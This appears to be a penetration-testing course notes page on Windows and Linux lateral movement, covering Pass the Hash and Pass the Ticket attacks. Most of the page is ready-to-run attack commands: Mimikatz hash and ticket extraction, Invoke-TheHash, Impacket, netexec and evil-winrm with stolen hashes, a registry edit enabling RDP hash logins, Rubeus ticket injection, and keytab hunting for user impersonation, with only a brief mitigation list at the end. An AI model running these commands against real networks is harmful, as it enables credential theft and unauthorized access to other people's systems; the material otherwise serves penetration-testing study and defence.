Windows Lateral Movement

1. Pass the Hash (PtH) Attack

Core Concept

  • Technique using password hash instead of plaintext password for authentication

  • No need to decrypt the hash

  • Exploits authentication protocol where hash remains static until password change

Windows NTLM Authentication Key Points

  • Challenge-response authentication protocol

  • Still common despite known flaws (legacy compatibility)

  • No password salting = vulnerability to PtH attacks

Requirements

  • Administrative privileges/specific privileges on target

  • Ways to obtain hashes:

    • Dumping local SAM database

    • Extracting from NTDS database (ntds.dit) on Domain Controller

    • Pulling from memory (lsass.exe)

Attack Methods & Tools

1. Mimikatz (Windows)

mimikatz.exe privilege::debug "sekurlsa::pth /user:username /rc4:NTLM_HASH /domain:domain.htb /run:cmd.exe" exit

Required parameters:

  • /user - Target username

  • /rc4 or /NTLM - NTLM hash

  • /domain - Domain name (use computer name/localhost/. for local)

  • /run - Program to execute (default: cmd.exe)

2. PowerShell Invoke-TheHash

# SMB Method
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target IP -Domain domain.htb -Username user -Hash HASH -Command "command"

# WMI Method
Invoke-WMIExec -Target hostname -Domain domain.htb -Username user -Hash HASH -Command "command"

3. Impacket (Linux)

impacket-psexec administrator@IP -hashes :HASH
impacket-wmiexec
impacket-atexec
impacket-smbexec

4. CrackMapExec (Linux)

# Network scan with hash
netexec smb IP/24 -u Administrator -d . -H HASH

# Command execution
netexec smb IP -u Administrator -d . -H HASH -x "command"

5. Evil-WinRM (Linux)

evil-winrm -i IP -u Administrator -H HASH

6. RDP Pass the Hash (Linux)

# Enable Restricted Admin Mode on target:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# Connect:
xfreerdp /v:IP /u:username /pth:HASH

Important PtH Considerations

  • UAC limits PtH for local accounts

  • LocalAccountTokenFilterPolicy affects remote admin capabilities:

    • 0 = only built-in admin (RID-500)

    • 1 = all local admins

  • Domain accounts with admin rights bypass these restrictions

2. Windows Pass the Ticket (PtT) Attack

Overview

  • Definition: A PtT attack leverages stolen Kerberos tickets (TGT or TGS) to move laterally in an Active Directory (AD) environment

  • Purpose: Exploits Kerberos authentication mechanisms without requiring NTLM password hashes or plaintext credentials

Kerberos Protocol Fundamentals

Key Concepts

  1. Ticket-Based Authentication:

    • Designed to minimize password sharing across services

    • Tickets authenticate users without transmitting passwords

  2. Kerberos Components:

    • TGT (Ticket Granting Ticket): Obtained after initial authentication; used to request service tickets (TGS)

    • TGS (Ticket Granting Service): Grants tickets for accessing specific services

Ticket Harvesting Tools

1. Mimikatz

# Extract tickets
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

2. Rubeus

# Dump tickets in Base64
c:\tools> Rubeus.exe dump /nowrap

# Retrieve and inject TGT
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[HASH] /ptt

# Import .kirbi ticket
Rubeus.exe ptt /ticket:[TICKET_FILENAME].kirbi

Lateral Movement Techniques

PowerShell Remoting

# Using Mimikatz
kerberos::ptt "[TICKET_FILENAME].kirbi"
Enter-PSSession -ComputerName [TARGET]

# Using Rubeus
Rubeus.exe createnetonly /program:"cmd.exe" /show
Rubeus.exe ptt /ticket:[TICKET_FILENAME].kirbi
Enter-PSSession -ComputerName [TARGET]

3. Linux Pass the Ticket (PtT) Attack

Key Linux Kerberos Attack Concepts

  • Leveraging Kerberos tickets on Linux machines integrated with Active Directory

  • Ticket storage in keytab or ccache files

  • Often located in /tmp directory or /etc/krb5.keytab

Attack Methodology

Ticket Discovery

# Check domain integration
realm list

# Find keytab files
find / -name *keytab* -ls 2>/dev/null
ls -la /tmp

# Check authentication services
ps -ef | grep -i "winbind\|sssd"

User Impersonation

# Inspect keytab file
klist -k -t /opt/specialfiles/carlos.keytab

# Impersonate user
kinit [email protected] -k -t /opt/specialfiles/carlos.keytab
klist

# Access network resources
smbclient //dc01/carlos -k -c ls

Additional Attack Techniques

# Set Kerberos cache
export KRB5CCNAME=/home/user/krb5cc_647401106

# Use Impacket with Kerberos
proxychains impacket-wmiexec dc01 -k

# Convert ticket formats
impacket-ticketConverter krb5cc_ticket julio.kirbi

Post-Exploitation

  • Check sudo privileges with sudo -l

  • Use tools like Linikatz for credential extraction

  • Potential privilege escalation paths

Mitigation Strategies

  • Implement strong password policies

  • Use Multi-Factor Authentication (MFA)

  • Limit administrative privileges

  • Regularly update and patch systems

  • Monitor and log authentication events

  • Use advanced endpoint protection

PreviousLinux Local Password AttacksNextFiles & Archives Cracking